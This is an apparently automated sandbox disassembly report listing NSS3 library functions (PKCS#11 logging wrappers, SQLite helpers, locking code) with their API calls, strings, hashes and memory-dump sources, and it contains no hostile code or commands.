                                                                                                                                                                                                                                                                                          • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 786543732-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 35b2031f1c8cded453312d728240aa52922fb0e58c76262e0fa54c2db1c38987
                                                                                                                                                                                                                                                                                          • Instruction ID: 797e384e838c8b03172ad0416053e0d1c5f63b66510588fd9e2d9a43ffda8fad
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35b2031f1c8cded453312d728240aa52922fb0e58c76262e0fa54c2db1c38987
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0451E1B0A061158BDF60EF98DC456AE7BF8BB0A34DF144536D804A3B42D374AD09CBDA
                                                                                                                                                                                                                                                                                          Function 6C72ADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C72ADE6
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C72AE17
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C72AE29
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C80D930: PL_strncpyz.NSS3(?,?,?), ref: 6C80D963
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C72AE3F
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C72AE78
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C72AE8A
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C72AEA0
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                                                                                                                                                                          • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
                                                                                                                                                                                                                                                                                          • API String ID: 332880674-605059067
                                                                                                                                                                                                                                                                                          • Opcode ID: b0791f867f2d94b8e1f624f549e7218599b5b9f91bad93e2058234c7dfd855ae
                                                                                                                                                                                                                                                                                          • Instruction ID: a64dfc3cfaa8a671df1ddc5f163620ca302ccb280bfe310932dcf7beabcd6a31
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0791f867f2d94b8e1f624f549e7218599b5b9f91bad93e2058234c7dfd855ae
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E31E775A01104AFCB609F14DE8DFAB37B9AB4671DF844835E4096BB02DB7CA809CBD1
                                                                                                                                                                                                                                                                                          Function 6C729EE0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(C_MessageEncryptInit), ref: 6C729F06
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C729F37
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C729F49
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C80D930: PL_strncpyz.NSS3(?,?,?), ref: 6C80D963
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C729F5F
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C729F98
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C729FAA
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C729FC0
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                                                                                                                                                                          • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageEncryptInit
                                                                                                                                                                                                                                                                                          • API String ID: 332880674-1139731676
                                                                                                                                                                                                                                                                                          • Opcode ID: 9b087c0aa859ed0a92a00ca0fc418ef5b3ef12579936838864c5dba1808a089e
                                                                                                                                                                                                                                                                                          • Instruction ID: 609a03d5789774f97b08ea3cec1f317f9ff47b606900b8962c067dd763a67667
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b087c0aa859ed0a92a00ca0fc418ef5b3ef12579936838864c5dba1808a089e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE31C471A05204ABCBB0DF14DE8CBAE77B5AB5631DF484835E80967B41DB7CA808CBD1
                                                                                                                                                                                                                                                                                          Function 6C7C4C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • sqlite3_value_text16.NSS3(?), ref: 6C7C4CAF
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C7C4CFD
                                                                                                                                                                                                                                                                                          • sqlite3_value_text16.NSS3(?), ref: 6C7C4D44
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                                                                                                          • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                                                                                                          • API String ID: 2274617401-4033235608
                                                                                                                                                                                                                                                                                          • Opcode ID: 8d2fd4b11261c66626b86d24466c2237de97e03978a93fa3c41ee38336682534
                                                                                                                                                                                                                                                                                          • Instruction ID: 8265e23d591e69b38957592ffaf50d454aaa69950e8392159fab26f9ac8d4dc6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d2fd4b11261c66626b86d24466c2237de97e03978a93fa3c41ee38336682534
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38317473B08853AFD7385624AB027B5B321BB83318F550935C9244BE29C724AC56E3EB
                                                                                                                                                                                                                                                                                          Function 6C722DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(C_InitPIN), ref: 6C722DF6
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C722E24
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C722E33
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C80D930: PL_strncpyz.NSS3(?,?,?), ref: 6C80D963
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C722E49
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C722E68
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C722E81
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                                          • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
                                                                                                                                                                                                                                                                                          • API String ID: 1003633598-1777813432
                                                                                                                                                                                                                                                                                          • Opcode ID: a2ff84cf757d9b8b1ee5c82e00dd7e200e9ce2f7ffd5022fd166b3d8b37f9fa8
                                                                                                                                                                                                                                                                                          • Instruction ID: 9a3e98bb557e6951da3935da54970db19ed6e0d12eaa8161d944a25a3baf9d23
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2ff84cf757d9b8b1ee5c82e00dd7e200e9ce2f7ffd5022fd166b3d8b37f9fa8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3931D075A01144ABCB309F149E4CA9B37B9AB4232DF844435E808A7B12DB3CE808DAD2
                                                                                                                                                                                                                                                                                          Function 6C727E00 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(C_VerifyUpdate), ref: 6C727E26
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C727E54
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C727E63
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C80D930: PL_strncpyz.NSS3(?,?,?), ref: 6C80D963
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C727E79
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C727E98
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C727EB1
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                                          • String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_VerifyUpdate
                                                                                                                                                                                                                                                                                          • API String ID: 1003633598-2508624608
                                                                                                                                                                                                                                                                                          • Opcode ID: 7b76715b2b9d3eb51998ce671c5af9eb89741e4738b0fdbb3664e118ac0d449d
                                                                                                                                                                                                                                                                                          • Instruction ID: 4889c663f983108f27290424ec1a7927e4851afc196da32e733accbc64a82f3e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b76715b2b9d3eb51998ce671c5af9eb89741e4738b0fdbb3664e118ac0d449d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C431AF75A02155ABDB609B28DF4DB9B77A5AB4231DF844435E80897B11DB3CAC08CAE1
                                                                                                                                                                                                                                                                                          Function 6C726EF0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C726F16
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C726F44
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C726F53
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C80D930: PL_strncpyz.NSS3(?,?,?), ref: 6C80D963
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C726F69
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C726F88
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C726FA1
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                                          • String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
                                                                                                                                                                                                                                                                                          • API String ID: 1003633598-226530419
                                                                                                                                                                                                                                                                                          • Opcode ID: 7043c867c561bc38e73c1852af8cdc48757f82dac7e1c79f9963f20718dc3e22
                                                                                                                                                                                                                                                                                          • Instruction ID: 76f1cadc7eec6c508048c01e999242c35dd9eed2e7be267605663c693710b8b9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7043c867c561bc38e73c1852af8cdc48757f82dac7e1c79f9963f20718dc3e22
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC31D074601154ABDB709F28DE4CF9A77B1AB4231DF884436E808A7B12DB7CA948CAD1
                                                                                                                                                                                                                                                                                          Function 6C727F30 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(C_VerifyFinal), ref: 6C727F56
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C727F84
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C727F93
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C80D930: PL_strncpyz.NSS3(?,?,?), ref: 6C80D963
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C727FA9
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C727FC8
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6C727FE1
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                                          • String ID: hSession = 0x%x$ pSignature = 0x%p$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_VerifyFinal
                                                                                                                                                                                                                                                                                          • API String ID: 1003633598-3315179127
                                                                                                                                                                                                                                                                                          • Opcode ID: 4222ef8495d382a097d8c8e80d6b90963347d9cab698cd6b9c2cbf4e44bdb982
                                                                                                                                                                                                                                                                                          • Instruction ID: 0679727faa3ab22b9fec25f64cfb9f834ee098c605ac81b42d9a9910b71ae23c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4222ef8495d382a097d8c8e80d6b90963347d9cab698cd6b9c2cbf4e44bdb982
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3310171606054ABDB309F18DF4CF9A77B1AB4231DF844435E80897B12DB7CA848CBE2
                                                                                                                                                                                                                                                                                          Function 6C7C2D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C7C2D9F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C67CA30: EnterCriticalSection.KERNEL32(?,?,?,6C6DF9C9,?,6C6DF4DA,6C6DF9C9,?,?,6C6A369A), ref: 6C67CA7A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C67CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C67CB26
                                                                                                                                                                                                                                                                                          • sqlite3_exec.NSS3(?,?,6C7C2F70,?,?), ref: 6C7C2DF9
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C7C2E2C
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C7C2E3A
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C7C2E52
                                                                                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(6C82AAF9,?), ref: 6C7C2E62
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C7C2E70
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C7C2E89
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C7C2EBB
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C7C2ECB
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C7C2F3E
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C7C2F4C
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1957633107-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 9f90add1b1035999e3c8b487707c7d0b70908397d22d18547e283f7bab12e68c
                                                                                                                                                                                                                                                                                          • Instruction ID: 7f5a5562946a839aeea057e4831f1c2e0b203d5263abbd72d6fd82e69ac3d7b6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f90add1b1035999e3c8b487707c7d0b70908397d22d18547e283f7bab12e68c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E618BB5F002068FEB10CFA8D989B9EB7B5AF59348F145438EC15A7701E731E845CBA6
                                                                                                                                                                                                                                                                                          Function 6C707C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C852120,Function_00097E60,00000000,?,?,?,?,6C78067D,6C781C60,00000000), ref: 6C707C81
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C674C70: TlsGetValue.KERNEL32(?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674C97
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C674C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674CB0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C674C70: PR_Unlock.NSS3(?,?,?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674CC9
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C707CA0
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C707CB4
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C707CCF
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79DD70: TlsGetValue.KERNEL32 ref: 6C79DD8C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C79DDB4
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C707D04
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C707D1B
                                                                                                                                                                                                                                                                                          • realloc.MOZGLUE(-00000050), ref: 6C707D82
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C707DF4
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C707E0E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
